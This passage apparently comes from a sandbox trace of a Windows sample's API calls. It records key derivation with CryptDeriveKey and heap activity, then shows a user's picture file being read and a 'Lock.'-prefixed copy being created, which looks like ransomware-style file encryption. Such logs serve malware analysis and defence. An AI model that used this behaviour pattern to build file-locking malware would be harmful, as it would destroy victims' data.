dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.010] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.011] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab308, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.012] CryptDeriveKey (in: hProv=0xa7caa0, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.012] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.012] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.012] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.012] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.013] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74668 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0212.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Y1E-1EvHMk4d A6QVp8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\y1e-1evhmk4d a6qvp8.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.014] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.014] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0212.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0212.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38543f8 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.016] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38543f8 | out: hHeap=0x2af0000) returned 1 [0212.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0212.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0212.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0212.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Y1E-1EvHMk4d A6QVp8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.y1e-1evhmk4d a6qvp8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0212.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0212.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0212.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0212.022] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.022] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x575e, lpOverlapped=0x0) returned 1 [0212.024] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x575e) returned 0x3865018 [0212.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0212.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x575e) returned 0x2a8a938 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865018 | out: hHeap=0x2af0000) returned 1 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x575e) returned 0x3865018 [0212.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865018 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.028] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0212.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 